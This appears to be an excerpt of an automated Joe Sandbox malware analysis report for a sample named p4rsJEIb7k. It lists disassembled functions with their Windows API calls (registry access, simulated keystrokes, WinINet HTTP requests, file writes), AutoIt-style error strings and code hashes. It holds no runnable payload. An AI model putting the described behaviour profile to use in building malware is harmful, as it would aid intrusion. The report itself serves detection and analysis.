                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CurrentDirectory$AttributesFile
                                                                                                                • String ID: *.*
                                                                                                                • API String ID: 769691225-438819550
                                                                                                                • Opcode ID: 5bfa431d4ef7075d2dc920e4199facb1e2714bc7465ef22df03346902ac9b5e5
                                                                                                                • Instruction ID: 4b7f18f3392d5c51d0b0bcfc25b88d1348604f1c1aa494fd035d881d108a9fe9
                                                                                                                • Opcode Fuzzy Hash: 5bfa431d4ef7075d2dc920e4199facb1e2714bc7465ef22df03346902ac9b5e5
                                                                                                                • Instruction Fuzzy Hash: 0561E5B61043419FD731EF54C885AEBB7E4EB84305F44882FED8983242D67D998E879E
                                                                                                                Function 0046A75F Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 179registryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046A84D
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ConnectRegistry
                                                                                                                • String ID: HH
                                                                                                                • API String ID: 76216097-2761332787
                                                                                                                • Opcode ID: 95544a26956fe54eb2a8636236a3b10fc217bfdb2bff17811b2f45cb9df4731a
                                                                                                                • Instruction ID: 68d8ff7817732ac0dd8275009c421e29eb5870de2046e22f9b94a35ba54c9d9f
                                                                                                                • Opcode Fuzzy Hash: 95544a26956fe54eb2a8636236a3b10fc217bfdb2bff17811b2f45cb9df4731a
                                                                                                                • Instruction Fuzzy Hash: FE617FB56083009FD304EF65C981F6BB7E4AF88704F14891EF681A7291D678ED09CB97
                                                                                                                Function 0045E62E Relevance: 14.2, APIs: 3, Strings: 5, Instructions: 155COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0045E676
                                                                                                                • LoadStringW.USER32(?,?,?,00000FFF), ref: 0045E69A
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: LoadString
                                                                                                                • String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                                                                • API String ID: 2948472770-2354261254
                                                                                                                • Opcode ID: fd3ade05fede2dfa3d14bccfacac15f81e3d16141c85e45952f832d3a26197ce
                                                                                                                • Instruction ID: 835382aeb01427732dc6b750cf2ba574ed77461063debdd42288bdc21f9728b4
                                                                                                                • Opcode Fuzzy Hash: fd3ade05fede2dfa3d14bccfacac15f81e3d16141c85e45952f832d3a26197ce
                                                                                                                • Instruction Fuzzy Hash: B051D5715143019BD324FB51CC41EAF77A8AF84354F14093FF94563292DB78AE49CB6A
                                                                                                                Function 00448602 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 105windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • CreateMenu.USER32 ref: 0044863C
                                                                                                                • SetMenu.USER32(?,00000000), ref: 0044864C
                                                                                                                • GetMenuItemInfoW.USER32(?,?,00000000,004A83D8), ref: 004486D6
                                                                                                                • IsMenu.USER32(?), ref: 004486EB
                                                                                                                • CreatePopupMenu.USER32 ref: 004486F5
                                                                                                                • InsertMenuItemW.USER32(?,?,00000001,004A83D8), ref: 00448739
                                                                                                                • DrawMenuBar.USER32 ref: 00448742
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                                                                                                • String ID: 0
                                                                                                                • API String ID: 161812096-4108050209
                                                                                                                • Opcode ID: 4add02930eb798c2c2cb68413aedc402262f89096725e95a36bc963f45c6c407
                                                                                                                • Instruction ID: 98f94d81d6847d6484dd50bbdc77a0bd9f9f2d632c710d3394220f00cc789bef
                                                                                                                • Opcode Fuzzy Hash: 4add02930eb798c2c2cb68413aedc402262f89096725e95a36bc963f45c6c407
                                                                                                                • Instruction Fuzzy Hash: 86417675604201AFD700CF68D894A9BBBE4FF89314F14891EFA488B350DBB5A845CFA6
                                                                                                                Function 00445A77 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 73windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetParent.USER32 ref: 00445A8D
                                                                                                                • GetClassNameW.USER32(00000000,?,00000100), ref: 00445AA0
                                                                                                                • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00445B3D
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ClassMessageNameParentSend
                                                                                                                • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                                                                • API String ID: 1290815626-3381328864
                                                                                                                • Opcode ID: 6f6f70247b4827d2a410ddc22f410c306ecb8b2e46d0c95c17204de523c723c4
                                                                                                                • Instruction ID: 9ea7b4bfd8e333fc3d4c3d1cc69785ca983c3453aa66f955cff8de8c622a02b1
                                                                                                                • Opcode Fuzzy Hash: 6f6f70247b4827d2a410ddc22f410c306ecb8b2e46d0c95c17204de523c723c4
                                                                                                                • Instruction Fuzzy Hash: F011E9B1B40301BBFF10B6659C46EAF739CDF94759F00081BFD44E6182F6ACA9458769
                                                                                                                Function 00428604 Relevance: 13.8, APIs: 9, Instructions: 306COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • CompareStringW.KERNEL32(?,?,004832AC,00000001,004832AC,00000001), ref: 00428611
                                                                                                                • GetLastError.KERNEL32(?,?,004832AC,00000001,004832AC,00000001), ref: 00428627
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CompareErrorLastString
                                                                                                                • String ID:
                                                                                                                • API String ID: 1733990998-0
                                                                                                                • Opcode ID: 16ce8c3a65625fd7540c51b5c1254bfa478756f7f63d0819a38d9cd03b2976a4
                                                                                                                • Instruction ID: 056e5a993d73ec50dc3c8e072878bb631c9b69e1f80941a2a69bbd8adeb14d7f
                                                                                                                • Opcode Fuzzy Hash: 16ce8c3a65625fd7540c51b5c1254bfa478756f7f63d0819a38d9cd03b2976a4
                                                                                                                • Instruction Fuzzy Hash: 0DA1B131B01225AFDF219F61EC41AAF7BB6AF94340FA4402FF81196251DF3D8891CB58
                                                                                                                Function 00456168 Relevance: 13.7, APIs: 9, Instructions: 181COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: b00adbc1ea9d53563bb8a7982d93c3fa4b8356126e06b3aad1cc727703ca6f1a
                                                                                                                • Instruction ID: 20732dcab93056f759d0b04a6df1a57780e33876730225f1fefd21ccf2a16f59
                                                                                                                • Opcode Fuzzy Hash: b00adbc1ea9d53563bb8a7982d93c3fa4b8356126e06b3aad1cc727703ca6f1a
                                                                                                                • Instruction Fuzzy Hash: 36519070200301ABD320DF29CC85F5BB7E8EB48715F540A1EF995E7292D7B4E949CB29
                                                                                                                Function 004417BC Relevance: 13.6, APIs: 9, Instructions: 142COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 2697ea5a26a9fc7488a3d070abad83f7d669ddccf749f4bfc66ff3ac1f4b4023
                                                                                                                • Instruction ID: b1e2397247e50d0c7000acf5a2db8631a214b417b603bec0598d849dd48054e0
                                                                                                                • Opcode Fuzzy Hash: 2697ea5a26a9fc7488a3d070abad83f7d669ddccf749f4bfc66ff3ac1f4b4023
                                                                                                                • Instruction Fuzzy Hash: E54128332402806BE320A75DB8C4ABBFB98E7A2362F50443FF18196520D76678C5D339
                                                                                                                Function 00445CF9 Relevance: 13.6, APIs: 9, Instructions: 69sleepkeyboardwindowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 0044593E: GetWindowThreadProcessId.USER32(00000001,00000000), ref: 0044595D
                                                                                                                  • Part of subcall function 0044593E: GetCurrentThreadId.KERNEL32 ref: 00445964
                                                                                                                  • Part of subcall function 0044593E: AttachThreadInput.USER32(00000000,?,00000001,00478FA7), ref: 0044596B
                                                                                                                • MapVirtualKeyW.USER32(00000025,00000000), ref: 00445D15
                                                                                                                • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00445D35
                                                                                                                • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 00445D3F
                                                                                                                • MapVirtualKeyW.USER32(00000025,00000000), ref: 00445D45
                                                                                                                • PostMessageW.USER32(00000000,00000100,00000027,00000000), ref: 00445D66
                                                                                                                • Sleep.KERNEL32(00000000), ref: 00445D70
                                                                                                                • MapVirtualKeyW.USER32(00000025,00000000), ref: 00445D76
                                                                                                                • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00445D8B
                                                                                                                • Sleep.KERNEL32(00000000,?,00000101,00000027,00000000), ref: 00445D8F
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 2014098862-0
                                                                                                                • Opcode ID: 621277f82d70151dd5f553487d646ea3797e8fa9e9e6e4ab5ab83039983e6254
                                                                                                                • Instruction ID: b085f3065cf9cd100f04f322da00d4b037e108fc79bf5967fdabce1cd6d2e74b
                                                                                                                • Opcode Fuzzy Hash: 621277f82d70151dd5f553487d646ea3797e8fa9e9e6e4ab5ab83039983e6254
                                                                                                                • Instruction Fuzzy Hash: 7B116971790704B7F620AB958C8AF5A7399EF88B11F20080DF790AB1C1C9F5E4418B7C
                                                                                                                Function 0045E912 Relevance: 12.6, APIs: 6, Strings: 1, Instructions: 353timeCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • VariantInit.OLEAUT32(00000000), ref: 0045E959
                                                                                                                • VariantCopy.OLEAUT32(00000000), ref: 0045E963
                                                                                                                • VariantClear.OLEAUT32 ref: 0045E970
                                                                                                                • VariantTimeToSystemTime.OLEAUT32 ref: 0045EAEB
                                                                                                                • VarR8FromDec.OLEAUT32(?,?), ref: 0045EB61
                                                                                                                • VariantInit.OLEAUT32(00000000), ref: 0045EBE7
                                                                                                                Strings
                                                                                                                • %4d%02d%02d%02d%02d%02d, xrefs: 0045EB19
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Variant$InitTime$ClearCopyFromSystem
                                                                                                                • String ID: %4d%02d%02d%02d%02d%02d
                                                                                                                • API String ID: 2968790880-1568723262
                                                                                                                • Opcode ID: 37b26c3e130c1a31af09048bf95897f87bf3bde4777f47a21ee6b10bd43e23e8
                                                                                                                • Instruction ID: db8708ae94f177a13b26e6bf0e0b18ed2eb17208bc27bd00c320e315e6f9d40a
                                                                                                                • Opcode Fuzzy Hash: 37b26c3e130c1a31af09048bf95897f87bf3bde4777f47a21ee6b10bd43e23e8
                                                                                                                • Instruction Fuzzy Hash: ABC1F4BB1006019BC704AF06D480666F7A1FFD4322F14896FED984B341DB3AE95ED7A6
                                                                                                                Function 00479C97 Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 274COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • VariantInit.OLEAUT32(?), ref: 00479F06
                                                                                                                • VariantClear.OLEAUT32(?), ref: 00479F11
                                                                                                                • VariantInit.OLEAUT32(?), ref: 00479DF7
                                                                                                                  • Part of subcall function 00467626: VariantInit.OLEAUT32(00000000), ref: 00467666
                                                                                                                  • Part of subcall function 00467626: VariantCopy.OLEAUT32(00000000,00479BD3), ref: 00467670
                                                                                                                  • Part of subcall function 00467626: VariantClear.OLEAUT32 ref: 0046767D
                                                                                                                • VariantClear.OLEAUT32(?), ref: 00479F9C
                                                                                                                  • Part of subcall function 004781AE: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000001,00000000,NULL Pointer assignment,00000001), ref: 00478201
                                                                                                                  • Part of subcall function 004781AE: VariantCopy.OLEAUT32(?,?), ref: 00478259
                                                                                                                  • Part of subcall function 004781AE: VariantCopy.OLEAUT32(-00000058,?), ref: 00478270
                                                                                                                  • Part of subcall function 004781AE: VariantCopy.OLEAUT32(-00000078,?), ref: 00478287
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Variant$Copy$ClearInit$ErrorLast
                                                                                                                • String ID: F$Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                                                                • API String ID: 2268567065-60002521
                                                                                                                • Opcode ID: d48da594d57f6aadbcc7a695fec4cf75dc39f6aec1ddb07572db38b207896a5c
                                                                                                                • Instruction ID: 799f1794578ead7d01377608c22e1fb401aa4fc5ffca8a64c02b8280356d09a3
                                                                                                                • Opcode Fuzzy Hash: d48da594d57f6aadbcc7a695fec4cf75dc39f6aec1ddb07572db38b207896a5c
                                                                                                                • Instruction Fuzzy Hash: 6091B272204341AFD720DF64D880EABB7E9EFC4314F50891EF28987291D7B9AD45C766
                                                                                                                Function 00401D10 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 235COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00401D5A
                                                                                                                • DestroyWindow.USER32(?), ref: 0042A751
                                                                                                                • UnregisterHotKey.USER32(?), ref: 0042A778
                                                                                                                • FreeLibrary.KERNEL32(?), ref: 0042A822
                                                                                                                • VirtualFree.KERNEL32(?,00000000,00008000), ref: 0042A854
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Free$DestroyLibrarySendStringUnregisterVirtualWindow
                                                                                                                • String ID: close all
                                                                                                                • API String ID: 4174999648-3243417748
                                                                                                                • Opcode ID: ddf39f1eda455a1c63d5a7d3271f56cd3ed42d138f3b783cbb3ca1597947a384
                                                                                                                • Instruction ID: e23b5dd52123a376b0379481fe8be5d2f02d07e70979f80a1c72d587d5a24a2c
                                                                                                                • Opcode Fuzzy Hash: ddf39f1eda455a1c63d5a7d3271f56cd3ed42d138f3b783cbb3ca1597947a384
                                                                                                                • Instruction Fuzzy Hash: FFA17075A102248FCB20EF55CC85B9AB3B8BF44304F5044EEE90967291D779AE85CF9D
                                                                                                                Function 0045DB3E Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 181COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • CoInitialize.OLE32(00000000), ref: 0045DB99
                                                                                                                • SHGetMalloc.SHELL32(?), ref: 0045DBA8
                                                                                                                • SHGetDesktopFolder.SHELL32(?,?), ref: 0045DC38
                                                                                                                • SHBrowseForFolderW.SHELL32 ref: 0045DCF5
                                                                                                                • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 0045DD13
                                                                                                                • CoUninitialize.OLE32 ref: 0045DD6B
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Folder$BrowseDesktopFromInitializeListMallocPathUninitialize
                                                                                                                • String ID: HH
                                                                                                                • API String ID: 2328888689-2761332787
                                                                                                                • Opcode ID: cbd34bb05af2b60d6becc686f20e38c9c02ad4ea561bbadf99ecd2e28994155d
                                                                                                                • Instruction ID: 9856a5a3be2a6f4b6f15ab218c20ab076772672eb14c4daba281b2e598c2a196
                                                                                                                • Opcode Fuzzy Hash: cbd34bb05af2b60d6becc686f20e38c9c02ad4ea561bbadf99ecd2e28994155d
                                                                                                                • Instruction Fuzzy Hash: E1619AB59043009FC320EF65C88499BB7E9BFC8704F048E1EF98987252D775E849CB6A
                                                                                                                Function 0044AA1F Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 171networkCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0044AA5A
                                                                                                                • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0044AA8D
                                                                                                                • InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 0044AAF9
                                                                                                                • InternetSetOptionW.WININET(00000000,0000001F,?,00000004), ref: 0044AB11
                                                                                                                • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0044AB20
                                                                                                                • HttpQueryInfoW.WININET(00000000,00000005,?,00000000,00000000), ref: 0044AB61
                                                                                                                  • Part of subcall function 0044286A: GetLastError.KERNEL32(00000000,0044AA07,?,00000000,00000000,00000001,?,?), ref: 00442880
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: HttpInternet$OptionQueryRequest$ConnectErrorInfoLastOpenSend
                                                                                                                • String ID:
                                                                                                                • API String ID: 1291720006-3916222277
                                                                                                                • Opcode ID: fd0d9a71f1b9f9aed2e07c44adb1cce69882d59a8a6dee97d1abd644e851efd9
                                                                                                                • Instruction ID: 782b6278bf246bef60821ca34847c3ce69a0d92f774604c9678bedd135ce19ea
                                                                                                                • Opcode Fuzzy Hash: fd0d9a71f1b9f9aed2e07c44adb1cce69882d59a8a6dee97d1abd644e851efd9
                                                                                                                • Instruction Fuzzy Hash: 9C51E6B12803016BF320EB65CD85FBBB7A8FB89704F00091EF74196181D7B9A548C76A
                                                                                                                Function 004180A7 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 161fileCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetModuleFileNameA.KERNEL32(00000000,00496789,00000104,?,00411739,?,00401C0B), ref: 0041814A
                                                                                                                • GetStdHandle.KERNEL32(000000F4,00000001,?,00000000,00000003,00000003,?,0041827E,000000FC,00418365,0048CA38,0000000C,00418422,00411739,?), ref: 0041821D
                                                                                                                • WriteFile.KERNEL32(00000000,00000000,00000000,00411739,00000000,?,0041827E,000000FC,00418365,0048CA38,0000000C,00418422,00411739,?,?,004224D3), ref: 00418247
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
